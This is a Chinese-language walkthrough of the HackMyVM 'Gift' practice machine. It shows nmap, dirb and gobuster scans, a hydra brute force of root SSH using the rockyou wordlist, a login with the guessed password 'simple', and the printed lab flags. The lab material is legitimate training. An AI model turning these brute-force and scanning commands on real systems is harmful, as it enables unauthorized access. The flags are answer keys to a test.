hmv[-_-]Gift
|
195
|
0
|
WEB

265 字
|
6 分钟

Gift

image-20240316011250568

扫描一下,正常,开淦!

image-20240316011345266

信息搜集

端口扫描

sudo nmap -p- -Pn -sS 10.161.61.135

刚做完Azer,有点一朝被蛇咬,十年怕井绳的感觉,哈哈哈。。

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 13:18 EDT
Nmap scan report for 10.161.61.135
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:F1:BD:13 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

目录扫描

dirb http://10.161.61.135
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Fri Mar 15 13:19:53 2024
URL_BASE: http://10.161.61.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://10.161.61.135/ ----
+ http://10.161.61.135/index.html (CODE:200|SIZE:57)
-----------------
END_TIME: Fri Mar 15 13:19:56 2024
DOWNLOADED: 4612 - FOUND: 1

结果并不令人满意,换一个试试。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.161.61.135 -f -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.161.61.135
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

获取flag

怪不得叫Gift,打开页面以后发现:

image-20240316012547831

查看源代码:

Dont Overthink. Really, Its simple.
    <!-- Trust me -->

查看敏感目录,一无所获。

无脑一波,尝试rockyou字典爆破ssh:

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135

爆破过程中手动连接一下ssh,随便尝试一些简单密码:

Trust me
Dont Overthink. Really, Its simple.
simple

结果进去了。。。。。还没爆破完呢。

┌──(kali㉿kali)-[~/temp]
└─$ ssh root@10.161.61.135  
The authenticity of host '10.161.61.135 (10.161.61.135)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.61.135' (ED25519) to the list of known hosts.
root@10.161.61.135's password: 
Permission denied, please try again.
root@10.161.61.135's password: 
Permission denied, please try again.
root@10.161.61.135's password: 
IM AN SSH SERVER
gift:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~# ls -la
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            26 Mar 15 17:33 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat root.txt
HMVtyr543FG
gift:~# cat user.txt
HMV665sXzDS

后来爆破结果出来了:

┌──(kali㉿kali)-[~]
└─$ sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-15 13:29:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.161.61.135:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 10.161.61.135   login: root   password: simple
[STATUS] attack finished for 10.161.61.135 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-15 13:32:09

记录一下吧,真好!

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
hmv[-_-]lookup

							
							

							
hmv[-_-]UnbakedPie

							
							

							
hmv[-_-]Pickle

							
							

							
hmv[-_-]Random

							
							

							
Vulnyx(°ー°〃)Psymin

							
							

							
hmv[-_-]HackingToys